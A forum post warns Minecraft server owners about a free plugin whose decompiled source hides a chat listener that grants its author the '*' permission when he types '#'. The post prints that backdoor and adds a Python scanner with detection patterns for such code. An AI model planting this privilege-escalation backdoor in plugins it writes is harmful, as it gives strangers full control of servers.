Yesterday someone joined a server that I currently co-own, and basically said he was a plugin developer and would work for us for free. For a small server without a great deal of money, an offer like this is a hard one to turn down, so we asked if he could make us a simple gapple command plugin, and so he did.
Me and the other owner were talking, and he was a little concerned, saying the plugin might break the server since we don't know the dev. So after he sent the plugin jar, we agreed that I would decompile it and take a quick look. I'm not really a Java developer, however I can understand it enough to be able to roughly work out what the plugin does from its source code.
I was looking through the code and it all looked good; it seemed like it would work and do what we needed. Then at the very bottom I happened to notice this:
Code:
import org.bukkit.Bukkit;
import org.bukkit.command.CommandSender;
import org.bukkit.event.EventHandler;
import org.bukkit.event.player.PlayerChatEvent;

// Listener found at the bottom of the decompiled plugin source.
@EventHandler
public void secretCommands(PlayerChatEvent e) {
    String msg = e.getMessage();
    // Any chat line starting with '#' triggers the hidden command.
    if (msg.startsWith("#")) {
        // Run GroupManager's manuaddp as the console, giving the sender the '*' (everything) permission.
        Bukkit.dispatchCommand((CommandSender) Bukkit.getConsoleSender(), "manuaddp " + e.getPlayer().getName() + " *");
        // Swallow the chat message so nobody else sees the trigger.
        e.setCancelled(true);
    }
}
From what I understand, he had added a small bit of code at the end so that if he were to type a # in chat, it would give him the * permission, allowing him to do basically anything on the server. I told the other owner and he confronted him; shortly after, he removed him on Skype and that was the last we heard.
This is mostly a warning to all those out there that come across a developer joining your server and offering to work for free. It's riskier than you might think. There is a useful online tool, http://www.javadecompilers.com/, that can be used to upload the jar and download its source code; then open it with Notepad, have a look at it, and search for keywords that would be suspicious, e.g. manuadd, manuaddp, pex, etc.
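As an added example (not code from the original post or from any plugin), here is a small Python script that automates the keyword search described above over decompiled Java source. The check names, regex patterns and risk levels are my own choices, not a standard; the BACKDOOR_SAMPLE is the snippet from the post, and the BENIGN_SAMPLE is a made-up gapple command for comparison. It goes a step beyond plain keyword matching by also flagging the shape of the backdoor: a chat handler that runs a console command which hands out permissions.

```python
import re

# (check name, regex) pairs applied to each line of decompiled Java source.
# These are constructed for this example; extend the list as you see fit.
CHECKS = [
    # A command run as the server console bypasses the sender's own permissions.
    ("console-dispatch", r"dispatchCommand\s*\(.*getConsoleSender\s*\("),
    # String literals that start with a permission-manager command (GroupManager, PEX, LuckPerms, op).
    ("perm-command", r'"\s*(manuadd(p|sub)?|pex|lp|op|deop)\b'),
    # Direct op grant through the Bukkit API.
    ("setop", r"\.setOp\s*\(\s*true\s*\)"),
    # The wildcard permission node as a literal.
    ("wildcard-perm", r'"\s*\*\s*"'),
    # Chat or command hooks: the usual place to hide a trigger word.
    ("chat-hook", r"\b(Async)?PlayerChatEvent\b|\bPlayerCommandPreprocessEvent\b"),
]


def scan_java_source(source):
    """Return a list of {check, line, text} findings for every matching line."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in CHECKS:
            if re.search(pattern, line):
                findings.append({"check": name, "line": lineno, "text": line.strip()})
    return findings


def risk_level(findings):
    """Combine individual findings into a coarse verdict (my own scale)."""
    names = {f["check"] for f in findings}
    grants = {"perm-command", "setop", "wildcard-perm"}
    # Console command that grants permissions, or a chat hook that runs console commands: the backdoor shape.
    if "console-dispatch" in names and (names & grants or "chat-hook" in names):
        return "high"
    if names & ({"console-dispatch"} | grants):
        return "medium"
    if names:
        return "low"
    return "none"


# Constructed sample: the listener from the post, as decompiled.
BACKDOOR_SAMPLE = """\
@EventHandler
public void secretCommands(PlayerChatEvent e) {
    String msg = e.getMessage();
    if (msg.startsWith("#")) {
        Bukkit.dispatchCommand((CommandSender) Bukkit.getConsoleSender(), "manuaddp " + e.getPlayer().getName() + " *");
        e.setCancelled(true);
    }
}
"""

# Constructed sample: a harmless gapple command that only checks the caller's own permission.
BENIGN_SAMPLE = """\
public boolean onCommand(CommandSender sender, Command cmd, String label, String[] args) {
    if (!(sender instanceof Player)) return false;
    Player p = (Player) sender;
    if (!p.hasPermission("gapple.use")) { p.sendMessage("No permission."); return true; }
    p.getInventory().addItem(new ItemStack(Material.GOLDEN_APPLE, 1));
    return true;
}
"""


def report(name, source):
    """Print findings for one source file and return its risk level."""
    findings = scan_java_source(source)
    print(f"== {name}: risk {risk_level(findings)}")
    for f in findings:
        print(f"  line {f['line']:>3} [{f['check']}] {f['text']}")
    return risk_level(findings)


if __name__ == "__main__":
    # To scan a real decompiled plugin: report(path, open(path, encoding="utf-8").read())
    report("backdoor sample", BACKDOOR_SAMPLE)
    report("benign sample", BENIGN_SAMPLE)
```

Run it over every `.java` file the decompiler produced and read any "medium" or "high" file by hand; the script only narrows down where to look, it does not prove a plugin is clean.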
